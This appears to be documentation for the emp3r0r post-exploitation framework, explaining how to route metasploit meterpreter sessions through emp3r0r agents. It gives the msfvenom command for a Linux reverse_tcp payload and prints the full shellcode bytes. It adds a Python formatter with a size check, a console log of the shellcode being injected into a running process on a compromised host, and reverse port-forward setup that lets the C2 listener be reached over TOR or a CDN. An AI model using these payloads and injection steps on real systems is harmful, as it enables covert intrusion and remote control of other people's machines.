Interoperability with metasploit and other C2 frameworks
Take metasploit as an example: you can easily generate a (staged) meterpreter shellcode with the following command:

```
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o shellcode.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Saved as: shellcode.bin
```
Note that we use 127.0.0.1 as the C2 address: the shellcode connects back to the agent's own loopback interface, which lets us encapsulate meterpreter inside emp3r0r's transport by reverse port mapping.
To format this shellcode for emp3r0r:
```
$ xxd -i shellcode.bin | grep 0x | tr -d '[:space:]' | tr -d ',' | sed 's/0x/\\x/g' | tee shellcode.txt
\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6
```
Save `shellcode.txt` under `/tmp/emp3r0r/www` before using the injector module. The file must contain nothing but the `\xHH` sequence: a stray comma, `0x` prefix or newline left over from the `xxd` output would corrupt the payload, so it is worth checking that the text decodes to exactly the byte count msfvenom reported (130 bytes above).
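The following Python script is an added example, not code from emp3r0r or metasploit. It does the same job as the `xxd | grep | tr | sed` pipeline above (encode raw bytes as a `\xHH` string), and adds the check a practitioner wants before dropping the file into `/tmp/emp3r0r/www`: the text is parsed back to bytes, rejected if it contains anything other than `\xHH` escapes, and its length is compared with the "Payload size" msfvenom printed. The function names and the sample bytes are assumptions of this example.

```python
"""Format raw shellcode bytes as the \\xHH text that emp3r0r's injector
module reads, and verify the text round-trips to the original byte count.

Added example, not part of emp3r0r or metasploit. It mirrors the
`xxd -i | grep | tr | sed` pipeline on this page and adds a length check
against the "Payload size" value that msfvenom prints.
"""
import re
import sys

# A valid file is one or more \xHH escapes with no separators or whitespace.
_ESCAPE_RE = re.compile(r"(\\x[0-9a-fA-F]{2})+")


def format_shellcode(data: bytes) -> str:
    """Encode every byte as \\xHH, lower-case hex, no separators."""
    return "".join(f"\\x{b:02x}" for b in data)


def parse_shellcode(text: str) -> bytes:
    """Decode \\xHH text back to bytes.

    Anything else (a stray comma, an '0x' prefix, a newline in the middle,
    the `unsigned int shellcode_bin_len` line from xxd) raises ValueError,
    so a corrupted file fails loudly instead of yielding a truncated payload.
    """
    text = text.strip()
    if not _ESCAPE_RE.fullmatch(text):
        raise ValueError("shellcode text is not a pure \\xHH sequence")
    return bytes.fromhex(text.replace("\\x", ""))


def check_payload_size(text: str, expected_size: int) -> bool:
    """True when `text` decodes to exactly `expected_size` bytes."""
    return len(parse_shellcode(text)) == expected_size


def convert_file(raw_path: str, txt_path: str, expected_size: int) -> bool:
    """Read raw bytes from `raw_path`, write the \\xHH text to `txt_path`
    and return whether the written text decodes to `expected_size` bytes."""
    with open(raw_path, "rb") as f:
        data = f.read()
    text = format_shellcode(data)
    with open(txt_path, "w") as f:
        f.write(text)
    return check_payload_size(text, expected_size)


if __name__ == "__main__":
    # Constructed sample bytes (not shellcode), used only for the round-trip.
    sample = bytes(range(0, 256, 17))  # 16 bytes: 0x00, 0x11, ..., 0xff
    text = format_shellcode(sample)
    assert parse_shellcode(text) == sample
    print(text)
    print("size ok:", check_payload_size(text, len(sample)))
    # Real use: python3 fmt.py shellcode.bin shellcode.txt 130
    if len(sys.argv) == 4:
        ok = convert_file(sys.argv[1], sys.argv[2], int(sys.argv[3]))
        print("size ok:", ok)
```

`convert_file` takes the byte count you read off msfvenom's "Payload size" line as its third argument; if it returns False the written file should not be used.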
```
2021/01/12 16:27:02
[0] Knock.. Knock...
d5966a56 from 192.168.122.40:51306 - HTTP2 (https://192.168.122.1), running 'CentOS Linux 7 (Core) 7'
emp3r0r > use injector
Using module 'injector'
emp3r0r (injector) > set method native
emp3r0r (injector) > target 0
emp3r0r (injector) > info
Option Value
====== =====
pid 0
method native
module injector
target 0
emp3r0r (injector) > run
2021/01/12 16:27:25 Please wait...
2021/01/12 16:27:25 The shellcode will live in `sleep` process, you will get notified when it exits
2021/01/12 16:38:32
[0] !inject native 0:
native has successfully injected shellcode into target process
emp3r0r (injector) >
```
Here is a diagram:

```
metasploit C2 --> emp3r0r C2 ---> agent
```
The metasploit C2's listening port is mapped onto the agent, which makes it reachable from every emp3r0r agent under the emp3r0r C2's control.

If your emp3r0r C2 uses a different transport, such as TOR or a CDN, your meterpreter session rides over that transport as well, and agents without internet access can still reach the metasploit C2 through emp3r0r's auto proxy feature.
Assuming metasploit is listening on 192.168.122.87:4444, and we want it available on the agent as 0.0.0.0:4444:
```
emp3r0r (injector) > use port_fwd
Using module 'port_fwd'
emp3r0r (port_fwd) > set switch reverse
emp3r0r (port_fwd) > set to 192.168.122.87:4444
emp3r0r (port_fwd) > set listen_port 4444
emp3r0r (port_fwd) > target 0
emp3r0r (port_fwd) > info
Option Value
====== =====
module port_fwd
target 0
to 192.168.122.87:4444
listen_port 4444
switch reverse
emp3r0r (port_fwd) > run
```
From here on it is the same process as described in "Run shellcode loader in emp3r0r".